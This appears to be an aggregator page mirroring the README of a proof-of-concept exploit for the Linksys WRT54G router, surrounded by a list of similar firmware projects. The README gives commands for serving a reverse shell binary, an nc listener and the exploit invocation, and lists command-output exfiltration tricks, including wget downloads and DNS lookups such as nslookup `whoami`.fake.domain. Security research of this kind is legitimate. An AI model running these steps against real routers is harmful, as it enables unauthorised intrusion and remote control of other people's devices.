GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → elongl → linksys-wrt54g

elongl / linksys-wrt54g

Licence: other
Exploiting Linksys WRT54G using a vulnerability I found.

Programming Languages

python
139335 projects - #7 most used programming language
c
50402 projects - #5 most used programming language

Labels

routerfirmwareopenwrtreverse-engineeringexploitation

Projects that are alternatives of or similar to linksys-wrt54g

firmware-core
nodewatcher firmware.
Stars: ✭ 26 (-16.13%)
Mutual labels:  firmware, openwrt
firmware
The Firmware for the Freifunk Bielefeld Community
Stars: ✭ 23 (-25.81%)
Mutual labels:  firmware, openwrt
HandsomeMod
IOT freedom for end users!
Stars: ✭ 39 (+25.81%)
Mutual labels:  firmware, openwrt
Phicomm-K2P-K3-OpenWrt-Firmware
Phicomm K3 OpenWrt firmware Compile by Github Actions,(K2P firmware update,see my mood)
Stars: ✭ 42 (+35.48%)
Mutual labels:  firmware, openwrt
Lime Packages
OpenWrt packages composing LibreMesh meta-firmware for wireless mesh networking
Stars: ✭ 204 (+558.06%)
Mutual labels:  firmware, openwrt
Iotgoat
IoTGoat is a deliberately insecure firmware created to educate software developers and security professionals with testing commonly found vulnerabilities in IoT devices.
Stars: ✭ 275 (+787.1%)
Mutual labels:  firmware, openwrt
xiaomi-r3g-openwrt-builder
OpenWrt builder for any supported routers using Docker. Scheduled to run weekly
Stars: ✭ 25 (-19.35%)
Mutual labels:  firmware, openwrt
ancistrus
Netgear's D7000 Nighthawk Router Experience Distributed Project
Stars: ✭ 61 (+96.77%)
Mutual labels:  firmware, openwrt
Exein Openwrt Public
Openwrt 18.06.5 featured with the Exein's security framework
Stars: ✭ 36 (+16.13%)
Mutual labels:  firmware, openwrt
Openwrtinvasion
Root shell exploit for several Xiaomi routers: 4A Gigabit, 4A 100M, 4, 4C, 3Gv2, 4Q, miWifi 3C...
Stars: ✭ 366 (+1080.65%)
Mutual labels:  firmware, openwrt
wrt-hisicam
OpenWrt based HiSilicon`s System-On-a-Chip ip camera firmware
Stars: ✭ 21 (-32.26%)
Mutual labels:  firmware, openwrt
source
Onion's fork of OpenWRT's source build system. The firmware for the Omega2, Omega2+, and Omega2 Pro is based on the openwrt-18.06 branch.
Stars: ✭ 73 (+135.48%)
Mutual labels:  firmware, openwrt
fastoverflowtk
This Buffer Overflow Toolkit works through FTP, SMTP, POP, HTTP protocols as well file outputs for playlists exploiting customized variables/commands. Payloads can be generated through MSFVENOM or you can use your own ASM files.
Stars: ✭ 16 (-48.39%)
Mutual labels:  exploitation
potd
A high scalable low to medium interactive SSH/TCP honeypot using Linux Namespaces, capabilities, seccomp, cgroups designed for OpenWrt and IoT devices.
Stars: ✭ 28 (-9.68%)
Mutual labels:  openwrt
openwrt-actions
利用github提供的actions编译openwrt固件
Stars: ✭ 14 (-54.84%)
Mutual labels:  openwrt
TG799VAC-XTREAM-V16.2-JADE
My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream Version 16.2 Jade delivered from Technicolor
Stars: ✭ 32 (+3.23%)
Mutual labels:  firmware
FlySkyRxFirmwareRssiMod
Patched firmwares for the various FlySky receivers to inject RSSI in IBUS channel 14
Stars: ✭ 96 (+209.68%)
Mutual labels:  firmware
WIZ750SR
WIZnet Serial to Ethernet(S2E) module based on W7500 chip, WIZ107/108SR S2E compatible device
Stars: ✭ 13 (-58.06%)
Mutual labels:  firmware
EvilSploit
EVILSPLOIT – A UNIVERSAL HARDWARE HACKING TOOLKIT
Stars: ✭ 63 (+103.23%)
Mutual labels:  firmware
RAWR-TFT-Firmware-Artillery3D
The best Artillery Sidewinder X1 and Genius TFT Firmware 🖨 🦖
Stars: ✭ 71 (+129.03%)
Mutual labels:  firmware
View All Similar Projects ➔

Exploiting Linksys WRT54G

Exploit

# Install the requirements.
pip install -r requirements.txt


ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin

ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141


# Start HTTP server in order to serve the reverse shell executable.
cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT

# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT

# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT

Leads for leaking command output

  • Look for file paths that are displayed within the web interface that command output can be written to.
    Using /tmp/ping.log to view the output at /Ping.asp.
  • Use wget to download reverse shell binary to the router.
  • Config the attacker as the DNS server and force the router to issue DNS requests with the command output.
    Like nslookup `whoami`.fake.domain

TODOs

  • Use argparse and make the exploit an executable.

Unsolved Mysteries

  • If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?

Links

Firmware
Toolchain

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].